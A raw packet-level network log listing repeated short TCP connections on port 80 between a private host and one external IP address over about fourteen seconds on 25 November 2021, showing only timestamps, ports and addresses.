Nov 25, 2021 10:50:36.057823896 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.059382915 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.093540907 CET	80	50126	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.093750000 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.128004074 CET	80	50126	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.143910885 CET	80	50126	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.143968105 CET	80	50126	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.144114017 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.144175053 CET	50126	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.178303957 CET	80	50126	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.523643970 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.557094097 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.557322025 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.558923006 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.592313051 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.592489958 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.625868082 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.641537905 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.641592979 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:36.641899109 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.641982079 CET	50127	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:36.676023960 CET	80	50127	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.023396015 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.056849957 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.057244062 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.058804035 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.092134953 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.092382908 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.125816107 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.141966105 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.142020941 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.142340899 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.142425060 CET	50128	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.176121950 CET	80	50128	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.526356936 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.559901953 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.560178041 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.561801910 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.595201969 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.595424891 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.628783941 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.644316912 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.644396067 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:37.644515991 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.644587040 CET	50129	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:37.678720951 CET	80	50129	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.028279066 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.061569929 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.061827898 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.063390017 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.096574068 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.096797943 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.129898071 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.146338940 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.146388054 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.146718979 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.146766901 CET	50130	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.180316925 CET	80	50130	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.465854883 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.500027895 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.500216007 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.501799107 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.535975933 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.536156893 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.570369959 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.586780071 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.586844921 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.587085009 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.587150097 CET	50131	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.621475935 CET	80	50131	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.949513912 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.982935905 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:38.983139038 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:38.984853029 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.018414974 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.018599987 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.052047014 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.068985939 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.069050074 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.069334984 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.069431067 CET	50132	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.102848053 CET	80	50132	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.462119102 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.496193886 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.496440887 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.497980118 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.531949043 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.532198906 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.566329002 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.594016075 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.594070911 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.594310999 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.594363928 CET	50133	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:39.628530979 CET	80	50133	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:39.976665020 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.010804892 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.011082888 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.012551069 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.046662092 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.046864033 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.081094980 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.099014997 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.099097013 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.099313974 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.099378109 CET	50134	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.133447886 CET	80	50134	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.484949112 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.518384933 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.518537045 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.520116091 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.553534031 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.553749084 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.587137938 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.605904102 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.605952024 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.606198072 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.606240034 CET	50135	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:40.639569044 CET	80	50135	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:40.995450020 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.028863907 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.029105902 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.030704975 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.064044952 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.064265966 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.097573996 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.114002943 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.114053011 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.114283085 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.114334106 CET	50136	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.147658110 CET	80	50136	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.488261938 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.522661924 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.522939920 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.524483919 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.558484077 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.558692932 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.593111038 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.609107018 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.609168053 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:41.609323978 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.609385967 CET	50137	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:41.643549919 CET	80	50137	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.004796028 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.038960934 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.039211035 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.040785074 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.074820995 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.075083971 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.109255075 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.125179052 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.125245094 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.125459909 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.125514984 CET	50138	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.159521103 CET	80	50138	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.499106884 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.532983065 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.533212900 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.534729004 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.568506956 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.568723917 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.602722883 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.618726015 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.618782043 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:42.618966103 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.619050980 CET	50139	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:42.653171062 CET	80	50139	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.001360893 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.035602093 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.035797119 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.037328959 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.071331024 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.071548939 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.105736017 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.121603966 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.121664047 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.121844053 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.121926069 CET	50140	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.156111956 CET	80	50140	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.521848917 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.555298090 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.555445910 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.557050943 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.590370893 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.590641975 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.623939991 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.646503925 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.646553993 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.646784067 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.646833897 CET	50141	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:43.680325031 CET	80	50141	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:43.973865032 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.008002043 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.008199930 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.009707928 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.043611050 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.043785095 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.077729940 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.100363970 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.100430012 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.100609064 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.100660086 CET	50142	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.134723902 CET	80	50142	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.492202997 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.525644064 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.525861979 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.527358055 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.560671091 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.560985088 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.594557047 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.614161015 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.614216089 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:44.614358902 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.614412069 CET	50143	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:44.648006916 CET	80	50143	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.004213095 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.037627935 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.037924051 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.039530993 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.072781086 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.073008060 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.106314898 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.122705936 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.122756004 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.122950077 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.122987986 CET	50144	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.156260014 CET	80	50144	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.473922968 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.508021116 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.508335114 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.509963989 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.543982983 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.544240952 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.578197002 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.598488092 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.598543882 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.598845005 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.598927975 CET	50145	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.633132935 CET	80	50145	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.955405951 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.989244938 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:45.989415884 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:45.990993977 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.024806023 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.025037050 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.058926105 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.081789017 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.081814051 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.081983089 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.082005024 CET	50146	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.115889072 CET	80	50146	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.410898924 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.444113970 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.444360018 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.446019888 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.479171991 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.479511023 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.512845039 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.528537989 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.528614998 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.528768063 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.528827906 CET	50147	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.562093973 CET	80	50147	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.928364992 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.962409973 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.962739944 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.964293957 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:46.998400927 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:46.998600006 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.032526970 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.048317909 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.048366070 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.048537016 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.048595905 CET	50148	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.082664013 CET	80	50148	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.445081949 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.478463888 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.478662968 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.480202913 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.513619900 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.513799906 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.547260046 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.564080954 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.564146996 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.564296007 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.564357996 CET	50149	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.597986937 CET	80	50149	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.953535080 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.987560987 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:47.987862110 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:47.989429951 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.023436069 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.023612022 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.057552099 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.077389002 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.077444077 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.077625036 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.077709913 CET	50150	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.112032890 CET	80	50150	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.456115007 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.490283966 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.490521908 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.492017984 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.525983095 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.526269913 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.560266972 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.577016115 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.577090025 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.577279091 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.577347994 CET	50151	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.611300945 CET	80	50151	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.921510935 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.954916000 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.955176115 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.956654072 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:48.989969969 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:48.990220070 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.023730993 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.039484978 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.039541006 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.039717913 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.039802074 CET	50152	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.073441029 CET	80	50152	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.417485952 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.451242924 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.451462030 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.453054905 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.486797094 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.487144947 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.521012068 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.536742926 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.536797047 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.537012100 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.537062883 CET	50153	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.571124077 CET	80	50153	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.946269989 CET	50154	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.979707003 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:49.979917049 CET	50154	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:49.981482029 CET	50154	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:50:50.014946938 CET	80	50154	176.223.209.128	192.168.11.20
Nov 25, 2021 10:50:50.015156984 CET	50154	80	192.168.11.20	176.223.209.128
